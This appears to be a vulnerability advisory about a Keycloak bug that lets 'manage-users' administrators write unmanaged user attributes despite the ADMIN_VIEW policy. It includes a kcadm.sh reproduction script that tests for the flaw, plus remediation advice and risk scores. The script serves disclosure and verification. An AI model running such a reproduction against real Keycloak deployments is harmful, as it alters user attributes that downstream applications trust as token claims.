Keycloak Unmanaged Attribute Modification Vulnerability for Administrators

Vulnerability

A vulnerability exists in Keycloak that allows administrators holding the 'manage-users' permission to bypass the 'Only administrators can view' setting for unmanaged attributes. That setting (the ADMIN_VIEW value of the realm's unmanaged attribute policy) is meant to make attributes that are not declared in the realm's user profile read-only, even for administrators. Affected servers accept administrator writes to such attributes anyway, so user profiles can be modified although the realm is configured to prevent it. The issue affects Keycloak versions prior to 26.4.0.

Impact

Exploitation of this vulnerability allows an administrator with 'manage-users' to change user attributes that the realm intended to be read-only. Because unmanaged attributes are commonly consumed by downstream applications (for example as token claims through protocol mappers), such changes can be misused wherever those attributes are trusted, with no realm-level control stopping them.

Reproduction

To reproduce this vulnerability, create a new realm and set its unmanaged attribute policy to 'Only administrators can view' (Realm settings, General, Unmanaged Attributes). Then, as an administrator with 'manage-users', use the Keycloak Admin CLI (kcadm.sh) to set an attribute that is not declared in the realm's user profile on a user. On an affected server the update succeeds and the new value is returned when the user is read back, despite the restriction; a server with the fix does not persist the change.
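The reproduction as a script, added here as an example and not taken from the advisory or from the Keycloak project. It assumes a reachable Keycloak at $KC_URL, a master-realm administrator in KC_ADMIN/KC_ADMIN_PASS, kcadm.sh and jq on PATH, and the realm, user and attribute names chosen below; the attribute is deliberately not declared in the realm's user profile, so it is unmanaged. The REST value behind the UI label 'Only administrators can view' is ADMIN_VIEW (the other values are ENABLED and ADMIN_EDIT).

```shell
#!/usr/bin/env sh
# Added example (not from the advisory or Keycloak): drive the reproduction with kcadm.sh
# and decide from the read-back value whether the server shows the advisory's behaviour.
# Assumed environment: Keycloak at $KC_URL, master-realm admin in KC_ADMIN/KC_ADMIN_PASS,
# kcadm.sh and jq on PATH. Realm, user and attribute names below are made up for the test.
set -eu

KC_URL="${KC_URL:-http://localhost:8080}"
KC_ADMIN="${KC_ADMIN:-admin}"
KC_ADMIN_PASS="${KC_ADMIN_PASS:-admin}"
REALM="${REALM:-attr-policy-test}"
USER_NAME="${USER_NAME:-alice}"
ATTR="${ATTR:-costCenter}"   # not declared in the user profile, hence unmanaged
NEW_VALUE="CC-42"

# Verdict from the policy in force and the attribute value before and after the write.
# Under ADMIN_VIEW the attribute is read-only for administrators, so any change is the bug.
# Under ENABLED or ADMIN_EDIT an administrator write is allowed and proves nothing.
assess() {
  p="$1"; before="$2"; after="$3"
  case "$p" in
    ADMIN_VIEW)
      if [ "$before" = "$after" ]; then echo "not-vulnerable"; else echo "VULNERABLE"; fi ;;
    ENABLED|ADMIN_EDIT)
      echo "write-allowed-by-policy" ;;
    *)
      echo "unknown-policy" ;;
  esac
}

# Read the first value of the unmanaged attribute for a user id, or "" if absent.
read_attr() {
  kcadm.sh get "users/$1" -r "$REALM" | jq -r --arg a "$ATTR" '.attributes[$a][0] // ""'
}

reproduce() {
  kcadm.sh config credentials --server "$KC_URL" --realm master \
    --user "$KC_ADMIN" --password "$KC_ADMIN_PASS"
  kcadm.sh create realms -s realm="$REALM" -s enabled=true

  # kcadm.sh update fetches the resource and merges the -s changes, so only the policy changes.
  kcadm.sh update users/profile -r "$REALM" -s unmanagedAttributePolicy=ADMIN_VIEW
  policy=$(kcadm.sh get users/profile -r "$REALM" | jq -r '.unmanagedAttributePolicy')

  uid=$(kcadm.sh create users -r "$REALM" -s username="$USER_NAME" -s enabled=true -i)
  before=$(read_attr "$uid")

  # The write a correctly enforced ADMIN_VIEW policy must not persist.
  # A fixed server may answer with an error here, so do not abort on failure.
  kcadm.sh update "users/$uid" -r "$REALM" -s "attributes.$ATTR=[\"$NEW_VALUE\"]" || true
  after=$(read_attr "$uid")

  echo "policy=$policy before='$before' after='$after'"
  assess "$policy" "$before" "$after"
}

# Only touch the server when explicitly asked: sh repro.sh run
if [ "${1:-}" = "run" ]; then
  reproduce
fi
```

Run it with `sh repro.sh run` after exporting the variables. It prints VULNERABLE when the policy reads ADMIN_VIEW and the attribute value changed, and not-vulnerable when the write was not persisted; running it again after the upgrade is the post-remediation check. The realm creation fails if the realm already exists, so remove it between runs with `kcadm.sh delete realms/$REALM`.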

Remediation

Upgrade to the Red Hat build of Keycloak 26.4.9, which addresses this vulnerability. After upgrading, repeat the reproduction above and confirm that the attribute write is no longer persisted under the 'Only administrators can view' policy.

Added: Feb 27, 2026, 8:28 AM
Updated: Feb 27, 2026, 2:52 PM

Vulnerability Rating

Custom Algorithm
spread: 5.2
impact: 0.6
exploitability: 6.3
remediation: 7.7
relevance: 3.3
threat: 6.4
urgency: 2.9
incentive: 0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.